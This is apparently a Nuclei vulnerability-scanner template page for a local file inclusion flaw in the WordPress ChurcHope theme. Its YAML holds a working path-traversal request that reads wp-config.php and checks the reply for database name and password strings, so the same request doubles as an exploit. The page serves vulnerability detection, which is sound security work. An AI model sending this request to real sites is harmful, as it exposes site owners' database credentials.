WordPress ChurcHope Theme <= 2.1 - Local File Inclusion
ID: churchope-lfi
Severity: high
Author: dhiyaneshDK
Tags: wp,wpscan,wordpress,wp-theme,lfi
Description
Section titled “Description”WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the ‘file’ HTTP GET parameter to the ‘/lib/downloadlink.php’ script, which is publicly accessible.
YAML Source
Section titled “YAML Source”id: churchope-lfi
info: name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion author: dhiyaneshDK severity: high description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. reference: - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 classification: cwe-id: CWE-22 metadata: max-request: 1 tags: wp,wpscan,wordpress,wp-theme,lfi
http: - method: GET path: - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and
- type: status status: - 200# digest: 4b0a004830460221009f2f7966e6bfd6bf9fc100786fb135ec274914f6f66f0e22e7ef4f4931ba0a46022100a562b6d898a8cc7018bb723b445ea610ca351a9e577cb04bf5b2aa5e55f7ce36:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/churchope-lfi.yaml"